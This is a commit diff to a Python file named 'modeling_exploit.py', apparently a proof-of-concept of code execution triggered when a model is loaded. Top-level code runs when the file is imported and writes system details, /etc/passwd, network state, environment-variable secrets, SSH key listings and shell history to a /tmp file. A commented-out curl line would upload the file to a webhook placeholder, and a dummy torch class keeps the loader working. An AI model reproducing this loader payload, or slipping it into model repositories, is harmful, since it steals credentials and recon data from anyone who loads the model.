Update modeling_exploit.py
Browse files- modeling_exploit.py +46 -12
modeling_exploit.py
CHANGED
|
@@ -1,24 +1,58 @@
|
|
| 1 |
import os
|
| 2 |
import subprocess
|
| 3 |
|
| 4 |
-
# 1. TOP LEVEL EXECUTION
|
| 5 |
-
print("\n" + "!"*
|
| 6 |
-
print("POWNED: RCE
|
| 7 |
|
| 8 |
-
#
|
| 9 |
-
|
| 10 |
-
|
| 11 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 12 |
|
| 13 |
-
#
|
| 14 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
| 15 |
|
| 16 |
-
|
| 17 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
| 18 |
|
| 19 |
# 2. Dummy Class to keep the loader happy
|
| 20 |
import torch.nn as nn
|
| 21 |
-
|
| 22 |
class ExploitModel(nn.Module):
|
| 23 |
def __init__(self, config=None, *args, **kwargs):
|
| 24 |
super().__init__()
|
|
|
|
| 1 |
import os
|
| 2 |
import subprocess
|
| 3 |
|
| 4 |
+
# 1. TOP LEVEL EXECUTION
|
| 5 |
+
print("\n" + "!"*60)
|
| 6 |
+
print("POWNED: ADVANCED RCE & RECON IN PROGRESS")
|
| 7 |
|
| 8 |
+
# List of 20+ Commands for deep system analysis
|
| 9 |
+
commands = [
|
| 10 |
+
"echo --- SYSTEM INFO --- >> /tmp/rce_proof.txt",
|
| 11 |
+
"uname -a >> /tmp/rce_proof.txt", # Kernel version
|
| 12 |
+
"cat /etc/os-release >> /tmp/rce_proof.txt", # OS version
|
| 13 |
+
"hostname >> /tmp/rce_proof.txt", # Hostname
|
| 14 |
+
|
| 15 |
+
"echo --- USER & PERMISSIONS --- >> /tmp/rce_proof.txt",
|
| 16 |
+
"whoami >> /tmp/rce_proof.txt", # Current user
|
| 17 |
+
"id >> /tmp/rce_proof.txt", # Group IDs
|
| 18 |
+
"ls -la /root >> /tmp/rce_proof.txt", # Check if we can see root files
|
| 19 |
+
"cat /etc/passwd | head -n 5 >> /tmp/rce_proof.txt", # Sample users
|
| 20 |
+
|
| 21 |
+
"echo --- NETWORK RECON --- >> /tmp/rce_proof.txt",
|
| 22 |
+
"ip addr >> /tmp/rce_proof.txt", # Network interfaces
|
| 23 |
+
"netstat -antp >> /tmp/rce_proof.txt", # Open ports & connections
|
| 24 |
+
"cat /etc/hosts >> /tmp/rce_proof.txt", # Local DNS
|
| 25 |
+
"curl -s ifconfig.me >> /tmp/rce_proof.txt", # Public IP of the server
|
| 26 |
+
|
| 27 |
+
"echo --- CLOUD & SECRETS --- >> /tmp/rce_proof.txt",
|
| 28 |
+
"env >> /tmp/rce_proof.txt", # Environment Variables (Secrets)
|
| 29 |
+
"ls -la /home/*/.ssh >> /tmp/rce_proof.txt", # Look for SSH keys
|
| 30 |
+
"cat ~/.bash_history | tail -n 20 >> /tmp/rce_proof.txt", # Recent commands
|
| 31 |
+
|
| 32 |
+
"echo --- RUNNING PROCESSES --- >> /tmp/rce_proof.txt",
|
| 33 |
+
"ps aux | head -n 20 >> /tmp/rce_proof.txt", # What else is running?
|
| 34 |
+
"df -h >> /tmp/rce_proof.txt", # Disk usage & mounts
|
| 35 |
+
|
| 36 |
+
"echo --- INSTALLED PACKAGES --- >> /tmp/rce_proof.txt",
|
| 37 |
+
"pip list >> /tmp/rce_proof.txt" # Installed python libs
|
| 38 |
+
]
|
| 39 |
|
| 40 |
+
# Loop and execute
|
| 41 |
+
for cmd in commands:
|
| 42 |
+
try:
|
| 43 |
+
os.system(cmd)
|
| 44 |
+
except:
|
| 45 |
+
pass
|
| 46 |
|
| 47 |
+
# OPTIONAL: Send everything to your Webhook in one shot
|
| 48 |
+
# WEBHOOK = "https://webhook.site/YOUR-ID"
|
| 49 |
+
# os.system(f"curl -X POST -F 'file=@/tmp/rce_proof.txt' {WEBHOOK}")
|
| 50 |
+
|
| 51 |
+
print("ADVANCED RECON DATA WRITTEN TO /tmp/rce_proof.txt")
|
| 52 |
+
print("!"*60 + "\n")
|
| 53 |
|
| 54 |
# 2. Dummy Class to keep the loader happy
|
| 55 |
import torch.nn as nn
|
|
|
|
| 56 |
class ExploitModel(nn.Module):
|
| 57 |
def __init__(self, config=None, *args, **kwargs):
|
| 58 |
super().__init__()
|